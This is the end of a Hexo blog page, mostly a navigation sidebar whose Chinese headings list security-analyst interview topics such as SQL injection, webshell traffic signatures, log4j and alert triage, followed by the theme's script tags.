href="#%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7%E7%B1%BB%E5%91%8A%E8%AD%A6%EF%BC%8C%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">代理工具类告警，流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%A0%E6%84%9F%E8%A7%89windows%E6%BC%8F%E6%B4%9E%E5%A4%9A%E8%BF%98%E6%98%AFlinux%E6%BC%8F%E6%B4%9E%E5%A4%9A"><span class="nav-text">你感觉windows漏洞多还是linux漏洞多</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D"><span class="nav-text">永恒之蓝</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%86%99%E6%96%87%E4%BB%B6"><span class="nav-text">sql注入写文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AD%A3%E5%90%91%E4%BB%A3%E7%90%86%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86"><span class="nav-text">正向代理反向代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5%E5%9C%A8%E6%B5%81%E9%87%8F%E5%91%8A%E8%AD%A6%E4%B8%8A%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%9A%84"><span class="nav-text">延时注入在流量告警上如何判断的</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82"><span class="nav-text">宽字节</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%81%E9%87%8F%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">流量代理工具有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E4%B8%8E%E5%93%A5%E6%96%AF%E6%8B%89%E7%9A%84%E8%BF%9E%E6%8E%A5%E7%89%B9%E5%BE%81"><span class="nav-text">冰蝎与哥斯拉的连接特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E6%98%AF%E5%90%A6%E6%94%BB%E5%87%BB%E6%88%90%E5%8A%9F"><span class="nav-text">怎么判断逻辑漏洞是否攻击成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E4%BF%AE%E5%A4%8D%E6%96%B9%E5%BC%8F"><span class="nav-text">sql注入修复方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E4%B8%8Engsoc%E5%8C%BA%E5%88%AB"><span class="nav-text">天眼与ngsoc区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%A6%82%E4%BD%95%E9%98%B2%E5%BE%A1"><span class="nav-text">文件上传漏洞如何防御</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xff"><span class="nav-text">xff</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql%E6%B3%A8%E5%85%A5%E5%86%99%E6%96%87%E4%BB%B6%E5%89%8D%E6%8F%90"><span class="nav-text">sql注入写文件前提</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0"><span class="nav-text">sqlmap一些参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#csrf"><span class="nav-text">csrf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf"><span class="nav-text">ssrf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B0%B4%E5%9D%91%E6%BC%8F%E6%B4%9E"><span class="nav-text">水坑漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%B1%BC%E5%8F%89%E6%94%BB%E5%87%BB"><span class="nav-text">鱼叉攻击</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#tomcat%E5%8F%AF%E4%BB%A5%E6%89%A7%E8%A1%8C%E7%9A%84%E5%90%8E%E7%BC%80%E5%90%8D"><span class="nav-text">tomcat可以执行的后缀名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ssrf%E6%9C%89%E5%93%AA%E4%BA%9B%E5%8D%8F%E8%AE%AE"><span class="nav-text">ssrf有哪些协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="nav-text">mysql数据库系统执行函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#nmap%E5%8F%82%E6%95%B0"><span class="nav-text">nmap参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E5%8F%AF%E4%BB%A5%E6%A3%80%E6%B5%8B%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%90%97"><span class="nav-text">天眼可以检测逻辑漏洞吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7%EF%BC%8C%E4%BB%A3%E7%90%86"><span class="nav-text">内网渗透工具，代理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B"><span class="nav-text">渗透测试流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90%E8%AF%AD%E6%B3%95"><span class="nav-text">天眼日志分析语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E5%92%8C%E5%A8%81%E8%83%81%E6%A3%80%E6%B5%8B%E5%8C%BA%E5%88%AB"><span class="nav-text">天眼流量分析和威胁检测区别</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E5%8F%AF%E4%BB%A5%E5%AE%A10day%E5%90%97"><span class="nav-text">天眼可以审0day吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E8%87%AA%E5%B7%B1%E7%9A%84%E6%9C%BA%E5%99%A8%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9F%9F%E6%8E%A7"><span class="nav-text">怎么判断自己的机器是不是域控</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81webshell%E6%B5%81%E9%87%8F%E4%BD%93%E5%BE%81"><span class="nav-text">常见webshell流量体征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3%E5%8F%8A%E6%BC%8F%E6%B4%9E"><span class="nav-text">常用数据库默认端口及漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E6%A0%87ip%E6%98%AF%E9%82%AE%E4%BB%B6%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A6%81%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">目标ip是邮件服务器要怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%AE%E7%9A%84ip%E6%98%AF114-114-114-114%E7%AB%AF%E5%8F%A3%E6%98%AF53%E9%9C%80%E8%A6%81%E5%B0%81%E7%A6%81%E5%90%97"><span class="nav-text">目的ip是114.114.114.114端口是53需要封禁吗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BE%A4%E9%87%8C%E9%9D%A2%E9%81%87%E5%88%B0exe%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">群里面遇到exe可执行程序怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%81%87%E5%88%B0%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%91%8A%E8%AD%A6%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86"><span class="nav-text">遇到远控木马告警如何处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cs"><span class="nav-text">cs</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark%E8%BF%87%E6%BB%A4%E6%9D%A1%E4%BB%B6"><span class="nav-text">wireshark过滤条件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-text">shiro反序列化漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%9A%81%E5%89%91%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">蚁剑流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92%E4%BC%A0%E6%92%AD%E6%96%B9%E5%BC%8F%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-text">勒索病毒传播方式有哪些</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#log4j%E6%BC%8F%E6%B4%9E"><span class="nav-text">log4j漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#wireshark%E6%8A%93%E5%88%B0%E6%95%B0%E6%8D%AE%E5%8C%85%E4%B9%8B%E5%90%8E%E4%BD%A0%E6%80%8E%E4%B9%88%E5%8E%BB%E5%88%86%E6%9E%90"><span class="nav-text">wireshark抓到数据包之后你怎么去分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#redis-mongodb%E7%AB%AF%E5%8F%A3%E5%8F%B7"><span class="nav-text">redis mongodb端口号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E6%8E%A2%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8A%9F%E8%83%BD"><span class="nav-text">天眼探针有什么功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E8%83%BD%E5%90%A6%E6%A3%80%E7%B4%A2%E7%BD%91%E7%BB%9C%E6%97%A5%E5%BF%97"><span class="nav-text">天眼能否检索网络日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#struct2%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E"><span class="nav-text">struct2命令执行漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E7%9B%AE%E7%9A%84%E7%AB%AF%E5%8F%A3%E4%B8%BA-x-X-x-x-%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9Fwin7%E6%88%96%E8%80%85win8%EF%BC%8C%E6%A3%80%E7%B4%A2%E8%AF%AD%E5%8F%A5%E8%A6%81%E6%80%8E%E4%B9%88%E5%86%99"><span class="nav-text">如果目的端口为: x.X.x.x,操作系统win7或者win8，检索语句要怎么写</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%8E%E4%B9%88%E5%86%99%E6%A8%A1%E7%B3%8A%E6%9F%A5%E8%AF%A2%E5%91%8A%E8%AD%A6%E7%B1%BB%E5%9E%8B%E4%B8%BA%E5%86%99%E5%85%A5%E6%96%87%E4%BB%B6%E7%9A%84%E6%A3%80%E7%B4%A2%E8%AF%AD%E5%8F%A5"><span class="nav-text">怎么写模糊查询告警类型为写入文件的检索语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E5%87%BA%E7%8E%B0%E4%B8%A4%E6%9D%A1%E7%9B%B8%E5%90%8C%E7%9A%84sql%E6%B3%A8%E5%85%A5%E5%91%8A%E8%AD%A6%E4%BD%A0%E4%BC%9A%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">如果出现两条相同的sql注入告警你会怎么处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E6%9E%9C%E5%87%BA%E7%8E%B0%E8%A0%95%E8%99%AB%E7%97%85%E6%AF%92%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%A6%82%E4%BD%95%E5%A4%84%E7%90%86"><span class="nav-text">如果出现蠕虫病毒告警，如何处理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="nav-text">php命令执行函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%B0%E8%9D%8E%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">冰蝎流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%93%A5%E6%96%AF%E6%8B%89%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-text">哥斯拉流量特征</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0%E6%9C%89%E5%85%A5%E4%BE%B5%E6%94%BB%E5%87%BB%EF%BC%8C%E6%9F%A5%E7%9C%8B%E4%B8%BB%E6%9C%BA%E7%9A%84%E5%93%AA%E4%BA%9B%E6%97%A5%E5%BF%97"><span class="nav-text">发现有入侵攻击，查看主机的哪些日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E9%98%B2%E8%8C%83%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-text">如何防范反序列化漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A9%E7%9C%BC%E4%B8%8A%E6%98%BE%E7%A4%BA%E5%A4%9A%E4%B8%AA%E4%B8%8D%E5%90%8Curl%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%8F%AF%E8%83%BD%E6%98%AF%E4%BB%80%E4%B9%88%E5%8E%9F%E5%9B%A0%EF%BC%9F"><span class="nav-text">天眼上显示多个不同url的SQL注入告警，可能是什么原因？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%91%E4%BB%AC%E5%9C%A8%E5%A4%A9%E7%9C%BC%E4%B8%8A%E9%81%87%E5%88%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%91%8A%E8%AD%A6%E6%97%B6%EF%BC%8C%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E7%9A%84%E6%B5%81%E7%A8%8B%E6%98%AF%E6%80%8E%E6%A0%B7%E7%9A%84%EF%BC%9F-%E5%90%8C%E4%B8%80%E5%8F%B0%E8%B5%84%E4%BA%A7%E5%A4%9A%E6%AC%A1%E5%8F%91%E5%87%BA%E5%90%8C%E4%B8%80%E4%B8%AA%E5%91%8A%E8%AD%A6%EF%BC%8C%E5%8F%AF%E8%83%BD%E7%9A%84%E5%8E%9F%E5%9B%A0%EF%BC%9F"><span class="nav-text">我们在天眼上遇到文件上传告警时，应急响应的流程是怎样的？ 同一台资产多次发出同一个告警，可能的原因？</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linux%E4%B8%B4%E6%97%B6%E6%96%87%E4%BB%B6%E4%BD%8D%E7%BD%AE"><span class="nav-text">linux临时文件位置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8%E5%A4%A9%E7%9C%BC%E9%81%87%E5%88%B0sql%E5%91%8A%E8%AD%A6%E6%80%8E%E4%B9%88%E5%A4%84%E7%90%86"><span class="nav-text">使用天眼遇到sql告警怎么处理</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<!-- common -->
<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/toggle-theme.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/code-block.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/libs/anime.min.js"></script>

<!-- local-search -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/local-search.js"></script>


<!-- lazyload -->

    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/lazyload.js"></script>


<div class="">
    
        <!-- post-helper -->
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/post-helper.js"></script>

        <!-- toc -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/toc.js"></script>
        

        <!-- copyright-info -->
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/js/post/copyright-info.js"></script>
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



    
        
    

</body>
</html>
